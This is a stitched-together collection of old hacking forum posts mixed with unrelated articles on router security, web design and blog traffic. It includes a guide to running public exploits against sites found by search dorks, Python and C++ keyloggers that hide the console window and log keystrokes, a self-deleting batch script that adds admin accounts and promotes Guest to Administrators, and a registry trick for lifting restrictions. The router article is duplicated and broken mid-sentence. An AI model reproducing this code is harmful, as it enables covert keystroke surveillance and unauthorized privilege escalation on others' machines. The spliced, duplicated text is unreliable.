Things you should know before you want to learn to hack

To get it out there, every damn forum, IRC channel or medium that is dedicated to the hacking and hacker universe has at least recieved this question once in it’s lifetime.

“How do I Hack?”

Look familiar? Well sure it does, because at one point in time we all have asked either ourselves or someone else this very question. Now the difference is how each of us turned out and learned along the way to the answer. I’m going to assume that this question is forged for hacking computer systems and bypassing security. For anyone looking to go out and ask this question to people they don’t know, let me give you some advice so save yourself some hassle and even from getting flamed.
Read. You want to know as much as you can about the way the internet works and the technology that drives it. Specifically I would start with some old school texts from textfiles.com. Also reading this is a great start, albeit one of the best. Get books, sometimes reading a computer screen for so long can get nostalgic or boring, pick up a book and read it.
Get Linux and get away from Windows. Learn it.Period.
Start teaching yourself a programming language. Assembly is a start, even C++ or Java are good ones. Web languages are great to start with as well, because they are fast to learn, and can push you into understanding basic concepts around the higher-end languages.
Get in with a good forum or group of people that will help you. I recommend suck-o.com, not because I frequent it myself, but because it is a place with people who are willing to teach you as much as they know themselves.
Setup your own testing environment, either virtually (ie VMware) or a 2 computer isolated network.
Start applying and testing the things that you’ve learned to your test environment, and make notes of your progress.

Now Hacking is a broad term, and I hate to have this post seem as if hacking only applies to computer systems, because it doesn’t. It can apply to almost every facet of life we experience daily, all it takes is some ingenuity and a will to hack something.

An Introduction to Web Hacking – Part 1: Vulnerabilities and Milw0rm

This article is to introduce you to common website vulnerabilities and exploiting. As a beginner we will cover a variety of topics that will explain some of the most common and useful vulnerabilities of websites as well as showing you how to find the vulnerabilities and exploit them. You should at least be familiar with using a computer, browsing the internet as well as know how to identify programming languages. I personally use Linux but I am going to assume you use Microsoft Windows, which it really isn’t going to make a difference at this point. However to start in this article I will talk about types of vulnerabilities, and how to use a site such as milw0rm.com to exploit a vulnerable site.

So to begin let me start by explaining common vulnerabilities you will come across on the web. These are some of the most common and most talked about vulnerabilities and are widely explained about on the web. I however am going to do my best to explain these in best possible way for you to understand. Let’s dive in!

XSS/CSS or Cross Site Scripting is one of many common vulnerabilities that can be found within web applications on the internet, we hear of this term frequently in web application security, as it is probably one of the most tested for vulnerabilities along side of SQL Injection. Do not confuse CSS in this article for Cascading Style Sheets which is the preferred acronym for that technology. I will be using the preferred XSS to identify Cross Site Scripting. XSS is a form of code-injection into a web page that is viewable by other web surfers. There are 3 primary types that are used: persistent, non persistent and DOM based. I will not dwell on explaining each of these types of XSS attacks. In identifying them however I will note which type it is for your reference.

SQL Injection much like XSS (injection) this vulnerability has to do with the database part of a website. The vulnerability is commonly found within web applications that do not properly filter user inputted data. Say you have a website that allows users to post comments on the site, if the data you submit to make a comment includes code/calls to the database when you submit it, and the website does not filter out that code, you will likely be able to grab/display or modify the database entries of the website. A couple forms of SQL injection include Blind SQL injection and incorrect type handling.

LFI and RFI stands for Local File Inclusion and Remote File Inclusion respectively. The first LFI allows for a user to execute a file located on the server hosting the website. An example would be a user using a file upload for images to upload a malicious script, and then executing the file after it uploads. RFI on the other hand allows for a user to execute a script that is not stored on the server but stored on another server or computer.

For the next part of this article I assume you don’t know what milw0rm.com is and how to use it. Milw0rm is one of the best sites in my opinion to find exploits. Since most of the vulnerabilities I have explained above are for web applications we will be looking at the web app section of milw0rm.com. You will notice that using milw0rm is pretty self-explanatory, the only reason I am writing about it however is because I have encountered many people who have absolutely no idea what to do there, or how to use the exploits there.

Goto http://www.milw0rm.com/webapps.php

This page shows exploits made for web applications, it shows the date which is important because when an exploit is found the developers for that application will hurry to close the vulnerability. At the time of this article I will be looking at exploits submitted on February 10th – 11th, 2008 which will be the most current submitted exploits. Lets look at http://www.milw0rm.com/exploits/5099 which is an exploit for Mix Systems Content Management System(CMS). This specific exploit is written in PHP and takes advantage of an SQL injection exploit remotely. Identifying the type of programming used for the exploit is important of course, normally you can identify the the code at the beginning of the script, some use PHP, others PERL, some PYTHON, it just depends what the author chose to use. Some exploits also give you instructions to use the specific script. The Mix Systems CMS exploit explains a usage scenario, since I will be using Terminal/command line to run the script instead of a browser this is the output I get when I run: php 5099.php

Usage: php 5099.php host type num_records
host: Your target ex www.target.com
type: 1 – plugin=katalog bug
2 – plugin=photogall bug
num_records: number or returned records(if 0 – return all)
example: php script.php site.com 10

It explains that in terminal I would type something such as php 5099.php host type num_records to command the execution of the script to perform the exploit on a defined website, the exploitable area of the site and the number of records to return/display, pretty easy right! So now you have to find a vulnerable website that makes use of Mix Systems CMS, this can be easily done using a Search Engine Dork (sometimes the exploits will give you a Dork you can use).

Well this is the end of Part 1 of An Introduction to Web Hacking – Vulnerabilities and Milw0rm. Please remember that milw0rm is not the only site to offer exploits and that these are not the only vulnerabilities that are available to find. Do some reading and research and stay tuned for the next article in this series. Cheers!

Writing KeyLoggers

How to Write a software Keylogger

According to wiki key loggers perform the following

Keystroke logging (often called keylogging) is a method of capturing and recording user keystrokes.

Although now a days you would also want to capture mouse events. I won’t be getting into mouse hooks in this tutorial. Some one else can do that if they like. The language I will use will be python obviously not the best choice but you can convert it into your desired language: C, Java or whatever.

My First example: A Module designed for this purpose:

A lot of languages will have key logging modules already available for use, python has one called PyHook. Here is an example of PyHook


import pythoncom, pyHook

def OnKeyboardEvent(event):
print event.Key
return True

# create a hook manager
hm = pyHook.HookManager()
# watch for all key events
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()

We import our modules then create a function and pass it an event parameter what this does is tell python an event should occur (in this case our keyboard input)

We then call our pyHook functions to listen for our keyboard input.

Wow a keylogger in about 8 – 20 lines of code

Next we can move on to win api

import win32api
import win32console
import win32gui
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)
try:
mylog_file = open("/HOME/output.txt","a")
except IOError:
print "Error grabbing file"
else:
while 1:
for i in range(32, 256):
keyit = win32api.GetAsyncKeyState(i)
if keyit == -32767:
keyEnd = 81
mylog_file.write(chr(i))
if i == keyEnd:
mylog_file.close()
keyin = open("/HOME/output.txt","r")
data = keyin.read()

Ok this is a bit more drastic code with some extras. If you don’t know what winapi is I suggest you read up on it. It will give you a lot of insight into coding

import necessary modules

import win32api
import win32console
import win32gui

we then hide the console window

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)

try and open a file for logging. Python tends to automagically create one if it’s not there

try:
mylog_file = open("/HOME/output.txt","a")
except IOError:
print "Error grabbing file"

get our range of Keys and call the winapi GetAsyncKeyState Function what this does according to microsoft

The GetAsyncKeyState function determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.


for i in range(32, 256):
keyit = win32api.GetAsyncKeyState(i)

If Shift Q is pressed log data to File


keyEnd = 81
mylog_file.write(chr(i))
if i == keyEnd:
mylog_file.close()
keyin = open("/HOME/output.txt","r")
data = keyin.read()

Alright that wasn’t so bad was it

This is just code to be a starting point I do not say these ways are the best or only ways its more or less meant as a very basic introduction to coding keyloggers

Next article (Sending keystrokes over the network)



Resources

Wiki http://en.wikipedia.org/wiki/Keystroke_logging
PyHook http://pyhook.wiki.sourceforge.net/
GetAsyncKeyState http://msdn.microsoft.com/en-us/library/ms646293(VS.85).aspx

How to secure your router in 11 steps!

This is a tutorial I wrote some time ago on how to secure your router. You can find many similar tutorials on the net but I dare say that mine is a bit more detailed and extensive. I have included a special section on firewall rules that I have not see else where.

So if you have any questions let me know and I can help you out. A good firewalled router is one of the best measures that you can take to protect your comptuer and network.

So this are my 11 steps to securing your Internet network. Although 11 steps may seem a lot it should not take you more than half an hour to do all of this. If you have tackled this issue before this should be just fun. If you are struggling with any part of this feel free to ask or PM me. Any way this tutorial has been written for info/sec minded people so I do not think that there should be any problem.

For all those who are not sure whether this is relevant to them let me say this. The router if you have one of course is the first line of defense against any possible intruders. A router with default configuration is a lot easier to hack than one that has been properly configured. Of course the hacker needs to know your IP to hack you and if you use proxies for all your Internet activities than that is great but if you like many others use torrents or like me run a tor relay than your IP is public knowledge and in the case of a static IP you can not just change when ever you want to.

I have seen girls cry on youtube videos because a hacker penetrated there firewall and deleted all the stuff they had on the computer. It is not a pleasant sight and if you do not want to be another victim of hackers this tutorial is a pretty good start to protecting your computer and your network.

1. Update your firmware

If your router is old you need to update your firmware. How to do that you may ask? Well the first thing is that you need to do is figure out what is the name and model of the router. Than Google it and you will find the site of the manufacturer of your router. Very likely they have the new firmware you are looking for.

2. Use a strong password

If you still have the default password than I think this is one of the first things that you need to address. A strong password should be at least six characters long and should contain random letters and numbers. I recommend you to use some tool that would generate a pass phrase for you but if not try to use some 1337 language.

3. Disable upNp

Once that you have a working router and do not plan to connect any other devices to it like switches or any thing else you do not need it any more. Hackers could use this service as described on this site: http://www.gnucitizen.org/blog/hacking-the-interwebs

4. Disable ping on the wan side

Plain and simple!

5. Use protocol filters

The following is taken from the following e-book: Router Security Configuration Guide 1.1 c.This e-book is publicly accessible on the following site: http://www.nsa.gov/snac/downloads_all.cfm

3 (TCP & UDP) tcpmux
7 (TCP & UDP) echo
9 (TCP & UDP) discard
11 (TCP) systat
13 (TCP & UDP) daytime
15 (TCP) netstat
19 (TCP & UDP) chargen
37 (TCP & UDP) time
43 (TCP) whois
67 (UDP) bootp
69 (UDP) tftp
95 (TCP & UDP) supdup
111 (TCP & UDP) sunrpc
135 (TCP & UDP) loc-srv
137 (TCP & UDP) netbios-ns
138 (TCP & UDP) netbios-dgm
139 (TCP & UDP) netbios-ssn
177 (UDP) xdmcp
445 (TCP) netbios (ds)
512 (TCP) rexec
515 (TCP) lpr
517 (UDP) talk
518 (UDP) ntalk
540 (TCP) uucp
1434 (UDP) Microsoft SQL Server
1900, 5000 (TCP & UDP) Microsoft UPnP SSDP
2049 (UDP) NFS
6000 – 6063 (TCP) X Window System
6667 (TCP) IRC
12345-6 (TCP) NetBus
31337 (TCP & UDP) Back Orifice

6. Disable DHCP

You would want to set static LAN IP’s on all of the computers that are using your router. After that you can disable the DHCP service.

7. Set firewall rules

The following is an excerpt from the e-book. You will find the following paragraphs on p.40:

• Reject all traffic from the internal networks that bears a source IP address
which does not belong to the internal networks. (Legitimate traffic
generated by sources on the internal networks will always bear a source
address within the range or ranges assigned to the internal networks; any
other traffic is attempting to claim a bogus source address, and is almost
certainly erroneous or malicious in nature.)

• Reject all traffic from the external networks that bears a source address
belonging to the internal networks. (Assuming that addresses are assigned
correctly, traffic sent from the external networks should always bear a
source address from some range other than those assigned to the internal
networks. Traffic bearing such spoofed addresses is often part of an
attack, and should be dropped by a border router.)

• Reject all traffic with a source or destination address belonging to any
reserved, unroutable, or illegal address range.

Now what does all of this mean you may ask? Well for a non-techie like me I was not sure either so I had to ask as well. Basically what it means is that you have to disable all connections coming from the outside (WAN) to the inside (LAN). So what do you need to do? You have to deny the following IP range: 192.168.1.0-192.168.1.255. Unless you are using remote asses option on your router you should implement this!

Next thing that you need to do is to prevent all internal IP ranges to connect to the out side that of course are not in use by any of the computers. So for instance if you have five computers using the 192.168.1.2-192.168.1.5 range than you should block all the other internal IP ranges. So in this case it would be 192.168.1.5-192.168.1.255 and do not forget the 192.168.1.0 LAN IP as well. You of course need the 192.168.1.1 to connect to the router because if you restrict your self from it than you would have to reset your router and start all over again.

8. Change the name of your router

Just do it!

9. Use MAC filters

Figure out all the MAC addresses of the computers that are using your router. Simply add them to the list and allow only those to use your router.

10. Use SSH to connect to the router

The last part is to use a secure way to communicate with your router. A good idea is to use SSH!

11. WIFI

If you are using WIFI you need to use some form of Encryption like Speaking for my self I found that the more I used windows the less I liked them. Until it came to the point that every day it was almost painful to turn on the computer and work on windows. Yeah, the games are great and it is easy to install programs but that is pretty much all it has to offer. So if you can manage with out your games for a while you do not really need windows at all. Sure it is difficult some times to install some applications of linux but most of the time you can use the applications that are already on your OS or you can use the GUI, package manager or Yast to install programs on it. Learning how to install from source is not that difficult and if you run into problems I just see it as a chalange. Maybe you find a bug and you can report it and in a way you are helping out the community. In windows there is no such thing, Probably they do not even look at the issue you are having. I do not think they care. They work for money and not necesarily to make people happy.

So this are my 11 steps to securing your Internet network. Although 10 steps may seem a lot it should not take you more than half an hour to do all of this. If you have tackled this issue before this should be just fun. If you are struggling with any part of this feel free to ask or PM me. Any way this tutorial has been written for info/sec minded people so I do not think that there should be any problem.

For all those who are not sure whether this is relevant to them let me say this. The router if you have one of course is the first line of defense against any possible intruders. A router with default configuration is a lot easier to hack than one that has been properly configured. Of course the hacker needs to know your IP to hack you and if you use proxies for all your Internet activities than that is great but if you like many others use torrents or like me run a tor relay than your IP is public knowledge and in the case of a static IP you can not just change when ever you want to.

I have seen girls cry on youtube videos because a hacker penetrated there firewall and deleted all the stuff they had on the computer. It is not a pleasant sight and if you do not want to be another victim of hackers this tutorial is a pretty good start to protecting your computer and your network.

1. Update your firmware

If your router is old you need to update your firmware. How to do that you may ask? Well the first thing is that you need to do is figure out what is the name and model of the router. Than Google it and you will find the site of the manufacturer of your router. Very likely they have the new firmware you are looking for.

2. Use a strong password

If you still have the default password than I think this is one of the first things that you need to address. A strong password should be at least six characters long and should contain random letters and numbers. I recommend you to use some tool that would generate a pass phrase for you but if not try to use some 1337 language.

3. Disable upNp

Once that you have a working router and do not plan to connect any other devices to it like switches or any thing else you do not need it any more. Hackers could use this service as described on this site: http://www.gnucitizen.org/blog/hacking-the-interwebs

4. Disable ping on the wan side

Plain and simple!

5. Use protocol filters

The following is taken from the following e-book: Router Security Configuration Guide 1.1 c.This e-book is publicly accessible on the following site: http://www.nsa.gov/snac/downloads_all.cfm

3 (TCP & UDP) tcpmux
7 (TCP & UDP) echo
9 (TCP & UDP) discard
11 (TCP) systat
13 (TCP & UDP) daytime
15 (TCP) netstat
19 (TCP & UDP) chargen
37 (TCP & UDP) time
43 (TCP) whois
67 (UDP) bootp
69 (UDP) tftp
95 (TCP & UDP) supdup
111 (TCP & UDP) sunrpc
135 (TCP & UDP) loc-srv
137 (TCP & UDP) netbios-ns
138 (TCP & UDP) netbios-dgm
139 (TCP & UDP) netbios-ssn
177 (UDP) xdmcp
445 (TCP) netbios (ds)
512 (TCP) rexec
515 (TCP) lpr
517 (UDP) talk
518 (UDP) ntalk
540 (TCP) uucp
1434 (UDP) Microsoft SQL Server
1900, 5000 (TCP & UDP) Microsoft UPnP SSDP
2049 (UDP) NFS
6000 – 6063 (TCP) X Window System
6667 (TCP) IRC
12345-6 (TCP) NetBus
31337 (TCP & UDP) Back Orifice

6. Disable DHCP

You would want to set static LAN IP’s on all of the computers that are using your router. After that you can disable the DHCP service.

7. Set firewall rules

The following is an excerpt from the e-book. You will find the following paragraphs on p.40:

• Reject all traffic from the internal networks that bears a source IP address
which does not belong to the internal networks. (Legitimate traffic
generated by sources on the internal networks will always bear a source
address within the range or ranges assigned to the internal networks; any
other traffic is attempting to claim a bogus source address, and is almost
certainly erroneous or malicious in nature.)

• Reject all traffic from the external networks that bears a source address
belonging to the internal networks. (Assuming that addresses are assigned
correctly, traffic sent from the external networks should always bear a
source address from some range other than those assigned to the internal
networks. Traffic bearing such spoofed addresses is often part of an
attack, and should be dropped by a border router.)

• Reject all traffic with a source or destination address belonging to any
reserved, unroutable, or illegal address range.

Now what does all of this mean you may ask? Well for a non-techie like me I was not sure either so I had to ask as well. Basically what it means is that you have to disable all connections coming from the outside (WAN) to the inside (LAN). So what do you need to do? You have to deny the following IP range: 192.168.1.0-192.168.1.255. Unless you are using remote asses option on your router you should implement this!

Next thing that you need to do is to prevent all internal IP ranges to connect to the out side that of course are not in use by any of the computers. So for instance if you have five computers using the 192.168.1.2-192.168.1.5 range than you should block all the other internal IP ranges. So in this case it would be 192.168.1.5-192.168.1.255 and do not forget the 192.168.1.0 LAN IP as well. You of course need the 192.168.1.1 to connect to the router because if you restrict your self from it than you would have to reset your router and start all over again.

8. Change the name of your router

Just do it!

9. Use MAC filters

Figure out all the MAC addresses of the computers that are using your router. Simply add them to the list and allow only those to use your router.

10. Use SSH to connect to the router

The last part is to use a secure way to communicate with your router. A good idea is to use SSH!

11. WIFI

If you are using WIFI you need to use some form of Encryption like WPA2 and use a strong password. I personally prefer using cables but that is just me!

Of course this is no guarantee that some skilled hacker could not hack you. If you are really concerned about this you could try and put another hardware firewall behind the router in the shape of an old computer running smoothwall or IPcop.

Nevertheless if you followed this instructions you should have a pretty good level of security. I have done all of these things on my router and they work so I am sure they will work on yours too.

P.S.This tutorial has been written by lyecdevf. If you choose to post it on other forums please give credit!
and use a strong password. I personally prefer using cables but that is just me!

Of course this is no guarantee that some skilled hacker could not hack you. If you are really concerned about this you could try and put another hardware firewall behind the router in the shape of an old computer running smoothwall or IPcop.

Nevertheless if you followed this instructions you should have a pretty good level of security. I have done all of these things on my router and they work so I am sure they will work on yours too.

P.S.This tutorial has been written by lyecdevf.

43 Web design mistakes you should avoid

There are several lists of web design mistakes around the Internet. Most of them, however, are the “Most common” or “Top 10” mistakes. Every time I crossed one of those lists I would think to myself: “Come on, there must be more than 10 mistakes…”. Then I decided to write down all the web design mistakes that would come into my head; within half an hour I had over thirty of them listed. Afterwards I did some research around the web and the list grew to 43 points.

The next step was to write a short description for each one, and the result is the collection of mistakes that you will find below. Some of the points are common sense, others are quite polemic. Most of them apply to any website though, whether we talk about a business entity or a blog. Enjoy!

1. The user must know what the site is about in seconds: attention is one the most valuable currencies on the Internet. If a visitor can not figure what your site is about in a couple of seconds, he will probably just go somewhere else. Your site must communicate why I should spend my time there, and FAST!

2. Make the content scannable: this is the Internet, not a book, so forget large blocks of text. Probably I will be visiting your site while I work on other stuff so make sure that I can scan through the entire content. Bullet points, headers, subheaders, lists. Anything that will help the reader filter what he is looking for.

3. Do not use fancy fonts that are unreadable: sure there are some fonts that will give a sophisticated look to your website. But are they readable? If your main objective is to deliver a message and get the visitors reading your stuff, then you should make the process comfortable for them.

4. Do not use tiny fonts: the previous point applies here, you want to make sure that readers are comfortable reading your content. My Firefox does have a zooming feature, but if I need to use on your website it will probably be the last time I visit it.

5. Do not open new browser windows: I used to do that on my first websites. The logic was simple, if I open new browser windows for external links the user will never leave my site. WRONG! Let the user control where he wants the links to open. There is a reason why browsers have a huge “Back” button. Do not worry about sending the visitor to another website, he will get back if he wants to (even porn sites are starting to get conscious regarding this point lately…).

6. Do not resize the user’s browser windows: the user should be in control of his browser. If you resize it you will risk to mess things up on his side, and what is worse you might lose your credibility in front of him.

7. Do not require a registration unless it is necessary: lets put this straight, when I browse around the Internet I want to get information, not the other way around. Do not force me to register up and leave my email address and other details unless it is absolutely necessary (i.e. unless what you offer is so good that I will bear with the registration).

8. Never subscribe the visitor for something without his consent: do not automatically subscribe a visitor to newsletters when he registers up on your site. Sending unsolicited emails around is not the best way to make friends.

9. Do not overuse Flash: apart from increasing the load time of your website, excessive usage of Flash might also annoy the visitors. Use it only if you must offer features that are not supported by static pages.

10. Do not play music: on the early years of the Internet web developers always tried to successfully integrate music into websites. Guess what, they failed miserably. Do not use music, period.

11. If you MUST play an audio file let the user start it: some situations might require an audio file. You might need to deliver a speech to the user or your guided tour might have an audio component. That is fine. Just make sure that the user is in control, let him push the “Play” button as opposed to jamming the music on his face right after he enters the website.

12. Do not clutter your website with badges: first of all, badges of networks and communities make a site look very unprofessional. Even if we are talking about awards and recognition badges you should place them on the “About Us” page.

13. Do not use a homepage that just launches the “real” website: the smaller the number of steps required for the user to access your content, the better.

14. Make sure to include contact details: there is nothing worse than a website that has no contact details. This is not bad only for the visitors, but also for yourself. You might lose important feedback along the way.

15. Do not break the “Back” button: this is a very basic principle of usability. Do not break the “Back” button under any circumstance. Opening new browser windows will break it, for instance, and some Javascript links might also break them.

16. Do not use blinking text: unless your visitors are coming straight from 1996, that is.

17. Avoid complex URL structures: a simple, keyword-based URL structure will not only improve your search engine rankings, but it will also make it easier for the reader to identify the content of your pages before visiting them.

18. Use CSS over HTML tables: HTML tables were used to create page layouts. With the advent of CSS, however, there is no reason to stick to them. CSS is faster, more reliable and it offers many more features.

19. Make sure users can search the whole website: there is a reason why search engines revolutionized the Internet. You probably guessed it, because they make it very easy to find the information we are looking for. Do not neglect this on your site.

20. Avoid “drop down” menus: the user should be able to see all the navigation options straight way. Using “drop down” menus might confuse things and hide the information the reader was actually looking for.

21. Use text navigation: text navigation is not only faster but it is also more reliable. Some users, for instance, browse the Internet with images turned off.

22. If you are linking to PDF files disclose it: ever clicked on a link only to see your browser freezing while Acrobat Reader launches to open that (unrequested) PDF file? That is pretty annoying so make sure to explicit links pointing to PDF files so that users can handle them properly.

23. Do not confuse the visitor with many versions: avoid confusing the visitor with too many versions of your website. What bandwidth do I prefer? 56Kbps? 128Kbps? Flash or HTML? Man, just give me the content!

24. Do not blend advertising inside the content: blending advertising like Adsense units inside your content might increase your click-through rate on the short term. Over the long run, however, this will reduce your readership base. An annoyed visitor is a lost visitor.

25. Use a simple navigation structure: sometimes less is more. This rule usually applies to people and choices. Make sure that your website has a single, clear navigation structure. The last thing you want is to confuse the reader regarding where he should go to find the information he is looking for.

26. Avoid “intros”: do not force the user to watch or read something before he can access to the real content. This is plain annoying, and he will stay only if what you have to offer is really unique.

27. Do not use FrontPage: this point extends to other cheap HTML editors. While they appear to make web design easier, the output will be a poorly crafted code, incompatible with different browsers and with several bugs.

28. Make sure your website is cross-browser compatible: not all browsers are created equal, and not all of them interpret CSS and other languages on the same way. Like it or not, you will need to make your website compatible with the most used browsers on the market, else you will lose readers over the long term.

29. Make sure to include anchor text on links: I confess I used to do that mistake until some time ago. It is easier to tell people to “click here”. But this is not efficient. Make sure to include a relevant anchor text on your links. It will ensure that the reader knows where he is going to if he clicks the link, and it will also create SEO benefits for the external site where the link is pointing.

30. Do not cloak links: apart from having a clear anchor text, the user must also be able to see where the link is pointing on the status bar of his browser. If you cloak your links (either because they are affiliate ones or due to other reasons) your site will lose credibility.

31. Make links visible: the visitor should be able to recognize what is clickable and what is not, easily. Make sure that your links have a contrasting color (the standard blue color is the optimal most of the times). Possibly also make them underlined.

32. Do not underline or color normal text: do not underline normal text unless absolutely necessary. Just as users need to recognize links easily, they should not get the idea that something is clickable when in reality it is not.

33. Make clicked links change color: this point is very important for the usability of your website. Clicked links that change color help the user to locate himself more easily around your site, making sure that he will not end up visiting the same pages unintentionally.

34. Do not use animated GIFs: unless you have advertising banners that require animation, avoid animated GIFs. They make a site look unprofessional and detract the attention from the content.

35. Make sure to use the ALT and TITLE attributes for images: apart from having SEO benefits the ALT and TITLE attributes for images will play an important role for blind users.

36. Do not use harsh colors: if the user is getting a headache after visiting your site for 10 consecutive minutes, you probably should pick a better color scheme. Design the color palette around your objectives (i.e. deliver a mood, let the user focus on the content, etc.).

37. Do not use pop ups: this point refers to pop ups of any kind. Even user requested pop ups are a bad idea given the increasing amount of pop blockers out there.

38. Avoid Javascript links: those links execute a small Javascript when the user clicks on them. Stay away from them since they often create problems for the user.

39. Include functional links on your footer: people are used to scrolling down to the footer of a website if they are not finding a specific information. At the very least you want to include a link to the Homepage and possibly a link to the “Contact Us” page.

40. Avoid long pages: guess what, if the user needs to scroll down forever in order to read your content he will probably just skip it altogether. If that is the case with your website make it shorter and improve the navigation structure.

41. No horizontal scrolling: while some vertical scrolling is tolerable, the same can not be said about horizontal scrolling. The most used screen resolution nowadays is 1024 x 768 pixels, so make sure that your website fits inside it.

42. No spelling or grammatical mistakes: this is not a web design mistake, but it is one of the most important factors affecting the overall quality of a website. Make sure that your links and texts do not contain spelling or grammatical mistakes.

43. If you use CAPTCHA make sure the letters are readable: several sites use CAPTCHA filters as a method of reducing spam on comments or on registration forms. There is just one problem with it, most of the times the user needs to call his whole family to decipher the letters.

4 Steps to Increase Your Blog Traffic

One of the most common complaints that I hear from bloggers is the fact that no matter how hard they try, they can’t grow their blogs past 100 or so daily page vies. Those early days are indeed the hardest, because you need to put hard work in without the certainty of achieving results.

If you are in that same situation, here is a simple strategy that will certainly increase your blog traffic and make you break the 1,000 daily page views mark. In fact, the strategy could be used even if your are already over that number but have reached a traffic plateau lately.

Just make sure to execute the 4 steps as planned and to spend the two hours and a half every day (obviously if you have more time available you can expand the time spent on each of the four steps proportionally).

First Step: Killer Articles (1 hour per day)

Spend one hour brainstorming, researching and writing killer articles (also called linkbaits, pillar articles and so on).

Notice that your goal is to release one killer article every week. If that is not possible aim for one every 15 days. So the one hour that you will spend every day will be dedicated to the same piece. In other words, expect killers articles to take from 5 up to 10 hours of work.

If you are not familiar with the term, a killer article is nothing more than a long and structured article that has the goal of delivering a huge amount of value to potential visitors. If you have a web design blog, for example, you could write an article with “100 Free Resources for Designers”. Here are some ideas for killer articles:

* create a giant list of resources,
* write a detailed tutorial teaching people how to do something,
* find a solution for a common problem in your niche and write about it, or
* write a deep analysis on a topic where people have only talked superficially

When visitors come across your killer article, you want them to have the following reaction: “Holy crap! This is awesome. I better bookmark it. Heck, I better even mention this on my site and on my Twitter account, to let my readers and friends know about it.”

Second Step: Networking (30 minutes per day)

Networking is essential, especially when you are just getting started. The 30 minutes that you will dedicate to it every day could be split among:

* commenting on other blogs in your niche,
* linking to the posts of bloggers in your niche, and
* interacting with the bloggers in your niche via email, IM or Twitter.

Remember that your goal is to build genuine relationships, so don’t approach people just because you think they can help to promote your blog. Approach them because you respect their work and because you think the two of you could grow together.

Third Step: Promotion (30 minutes per day)

The first activity here is the promotion of your killer articles. Whenever you publish one of them, you should push it in any way you can. Examples include:

* letting the people in your network know about it (don’t beg for a link though),
* letting bloggers and webmasters in relevant niches know about it,
* getting some friends to submit the article to social bookmarking sites,
* getting some friends to Twitter the article, and
* posting about the article in online forums and/or newsgroups.

If there is time left, spend it with search engine optimization, social media marketing and activities to promote your blog as whole. Those can range from keyword research to promoting your blog on Facebook and guest blogging.

Fourth Step: Normal Posts (30 minutes per day)

Just like a man does not live by bread alone, a blog does not live by killer articles alone. Normal posts are the ones that you will publish routinely in your blog, between the killer articles. For example, you could publish a killer article every Monday and normal posts from Tuesday through Friday. Here are some ideas for normal posts:

* a post linking to an article on another blog and containing your opinion about it
* a post informing your readers about a news in your niche
* a post asking a question to your readers and aiming to initiate a discussion
* a post highlighting a new resource or trick that you discovered and that would be useful to your readers

While killers articles are essential to promote your blog and bring new readers aboard, normal posts are the ones that will create diversity in your content and keep your readers engaged.

Hacking ADMIN privileges from Guest/User account

Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.

HaCk "GUEST" with Admin privileges........


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...


if you find this post working please comment.

Hiding Command Prompt

I had an issue running a private World of Warcraft server, there were to many open command windows on my PC which I also use for development. Here is a solution which I found.

Head over to:

http://www.commandline.co.uk/cmdow/

to get a list of Windows open in particular there handles

cmdow.exe /T

In my case I wanted the handle the command(cmd) windows which were open

Let’s hide em’

cmdow.exe handle /hid

cheers

C++ Local Key Logger

Here is a simple example keylogger code written in C

it has the ability to hide the cmd window

have fun

#include
#include
#include
#define _WIN32_WINNT 0×0500
#include

using namespace std;

int main(int argc, char *argv[])
{
HWND win;
win = GetConsoleWindow();
ShowWindow(win, SW_HIDE);
ofstream myfile;
myfile.open(“C:\\keys.txt”);
while (1) {
int i;
short keyit;
for (i = 32; i <= 256; i++) {
keyit = GetAsyncKeyState(i);
if (keyit == -32767) {
int keyEnd;
keyEnd = 81;
myfile << char(i);
if (i == keyEnd) {
myfile.close();
}
}
}
}
return 0;
}

Basics of Hacking

Getting Ip's:--
To see the ip all computers you are connected to (web servers, people attempting to hack into your computer).
Go to dos (start>run>type command) and run the netstat command. Type netstat /? for details.
Type netstat -r at the command prompt to see the ip of all computers you are connected to.
In MSN (and other programs) when you are chatting to someone everything you type goes through the MSN servers first (they act as a proxy) so you see their ip rather than who you are chatting to. You can get round this by sending them a file as MSN doesn't send file through its proxy.
When you type the netstat -r (or -a for a different view) the ip's are under the foreign address table. The ports are seperated by a : . Different programs use different ports, so you can work out which ip's are from which program.
Connecting to other computers and what ports are:--
Servers send information. Clients retrieve. Simple. Windows comes with a built in program to connect to other computers called telnet.
To start Windows telnet Start menu> Run> type Telnet. Click connect> remote system.
Ports are doors into computers. Hosts are computer names (ip number or a name that is translated into the ip automatically)
Different programs open different ports, but they always open the same ports so other computers know which port to connect to.
You can get a port list listing all the different ports, but a basic one is:
11 :- Sends info on the computer
21 :- FTP (File transfer program)
23 :- Telnet (Login to the computers command line)
25 :- Smtp (Sends mail)
80 :- Http (Web pages)
There are thousands of different programs using different ports. You can get programs called portscanners which check a computer for all ports up to a certain number, looking for ways in. You can portscan a computer looking for ways-in.
Anyway, back to telnet. Type www.yahoo.com as the host and port as 80 the click connect. If nothing happens, you're in. Wow. You are connected to Yahoo's server. You can now type http commands (you are connected to an http server, so it supports http commands). Ie. on an ftp server you can type open and it will do something. On an http server it will just wonder what the hell you are on about.
Type get / http/1.0 then press enter twice to get the file on the server at / (try /index.html) etc.)

Allowing dos and regedit in a restricted Windows:
A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:
REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKE_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0
Save it as something.reg then run it. Simple.

Proxies:
Proxies are computers that you connect through, hiding your computer. Most aren't anonymous, they give away your ip.
Good anonymous proxies: mail.uraltelecom.ru:8080 and 194.247.87.4:8080.
Different programs require different ways of using proxies. To do it in Internet Explorer go to tools, internet options, connections, settings. In the above proxies they are in the format host:port
Reply me if u like it.